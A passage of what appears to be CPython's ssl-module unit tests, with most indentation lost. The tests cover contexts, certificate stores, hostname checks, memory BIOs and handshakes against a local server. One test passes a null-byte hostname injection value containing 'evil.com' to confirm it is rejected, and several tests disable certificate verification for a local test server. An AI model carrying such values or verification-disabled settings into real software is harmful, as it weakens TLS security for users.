ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
    def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno.
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
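# The two BIOs stand in for the network: "incoming" receives TLS records
# read from the socket and feeds them to the SSLObject, while "outgoing"
# collects the records the SSLObject produces for us to send on the socket
# (see ssl_io_loop above).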
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
